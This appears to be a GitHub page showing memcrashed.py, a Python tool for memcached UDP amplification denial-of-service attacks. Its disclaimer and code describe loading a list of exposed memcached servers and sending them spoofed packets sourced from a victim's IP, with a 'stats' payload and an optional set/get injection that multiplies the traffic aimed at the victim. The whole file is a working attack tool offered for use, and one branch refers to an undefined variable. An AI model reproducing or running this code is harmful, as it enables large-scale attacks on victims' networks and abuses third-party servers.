-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmemcrashed.py
148 lines (129 loc) · 8.47 KB
/
memcrashed.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
#-- coding: utf8 --
#!/usr/bin/python
import sys, os, time, shodan
import logging
logging.getLogger("scapy3k.runtime").setLevel(logging.ERROR) ##removes the ipv6 warning
from pathlib import Path
from scapy.all import * ##please change it to from scapy3k.all import * if giving error
from contextlib import contextmanager
starttime=time.time()
#@contextmanager
#def suppress_stdout():
# with open(os.devnull, "w") as devnull:
# old_stdout = sys.stdout
# sys.stdout = devnull
# try:
# yield
# finally:
# sys.stdout = old_stdout
keys = Path("./api.txt")
logo = """
███╗ ███╗███████╗███╗ ███╗ ██████╗██████╗ █████╗ ███████╗██╗ ██╗███████╗██████╗
████╗ ████║██╔════╝████╗ ████║██╔════╝██╔══██╗██╔══██╗██╔════╝██║ ██║██╔════╝██╔══██╗
██╔████╔██║█████╗ ██╔████╔██║██║ ██████╔╝███████║███████╗███████║█████╗ ██║ ██║
██║╚██╔╝██║██╔══╝ ██║╚██╔╝██║██║ ██╔══██╗██╔══██║╚════██║██╔══██║██╔══╝ ██║ ██║
██║ ╚═╝ ██║███████╗██║ ╚═╝ ██║╚██████╗██║ ██║██║ ██║███████║██║ ██║███████╗██████╔╝
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝╚═════╝
Author: @037
Edited: Nuzer-Rednek
Version: 4.0.1
####################################### DISCLAIMER ################################################
| Memcrashed 4.0.1 is a tool that allows you to use Shodan.io's amp server list filtered without |
| having a paid account to obtain hundreds of vulnerable memcached servers, provided with already |
| existing bots.txt with ip list. It then allows you to use the same servers to launch widespread |
| distributed denial of service attacks by forging UDP packets sourced to your victim. |
| Default payload includes the memcached "stats" command, 10 bytes to send, but the reply |
| is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly. |
| I am NOT responsible for any damages caused or any crimes committed by using this tool. |
###################################################################################################
"""
def memcrash(target):
print(target)
print(logo)
while True:
print('')
try:
myresults = Path("./bots.txt") ##removed api entry and api check
query = 'y'
saveme = 'y'
if myresults.is_file():
ip_arrayn = []
with open('bots.txt') as my_file: ##uses pre-saved bots.txt
for line in my_file:
ip_arrayn.append(line)
ip_array = [s.rstrip() for s in ip_arrayn]
else:
print('')
print('[✘] Error: No bots stored locally, bots.txt file not found!')
print('')
if saveme.startswith('y') or query.startswith('y'):
print('')
target = input("[▸] Enter target IP address or press enter to use command line target: ")
targetport = input("[▸] Enter target port number (Default 80): ") or "80"
power = int(input("[▸] Enter preferred power (Default 1): ") or "1")
print('')
data = input("[] Enter payload contained inside packet: ") or "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"
if (data != "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"):
dataset = "set injected 0 3600 ", len(data)+1, "\r\n", data, "\r\n get injected\r\n"
setdata = ("\x00\x00\x00\x00\x00\x00\x00\x00set\x00injected\x000\x003600\x00%s\r\n%s\r\n" % (len(data)+1, data))
getdata = ("\x00\x00\x00\x00\x00\x00\x00\x00get\x00injected\r\n")
print("[] Payload transformed: ", dataset)
print('')
##removed show bots list
engage = input('[*] Ready to engage target %s? <Y/n>: ' % target).lower()
if engage.startswith('y'):
if saveme.startswith('y'):
for i in ip_array:
if (data != "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"):
print('[] Sending 2 forged synchronized payloads to: %s' % (i))
# with True:
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata), count=1)
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata), count=power)
else:
if power>1:
print('[] Sending %d forged UDP packets to: %s' % (power, i))
#with suppress_stdout():
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power)
elif power==1:
print('[] Sending 1 forged UDP packet to: %s' % i)
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power)
else:
for result in results['matches']:
if (data != "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"):
print('[] Sending 2 forged synchronized payloads to: %s' % (i))
#with suppress_stdout():
send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata), count=1)
send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata), count=power)
else:
if power>1:
print('[] Sending %d forged UDP packets to: %s' % (power, result['ip_str']))
#with suppress_stdout():
send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power)
elif power==1:
print('[] Sending 1 forged UDP packet to: %s' % result['ip_str'])
#with suppress_stdout():
send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power)
print('')
print('[•] Task complete! Exiting Platform. Have a wonderful day.')
break
else:
print('')
print('[✘] Error: %s not engaged!' % target)
print('[~] Restarting Platform! Please wait.')
print('')
else:
print('')
print('[✘] Error: No bots stored locally')
print('[~] Restarting Platform! Please wait.')
print('')
except shodan.APIError as e:
print('[x] Exiting')
def run(target):
targ=target
print(target)
memcrash(target)
def main():
host_ip = input("Enter host IP: ")
memcrash(host_ip)
if __name__ == "__main__":
main()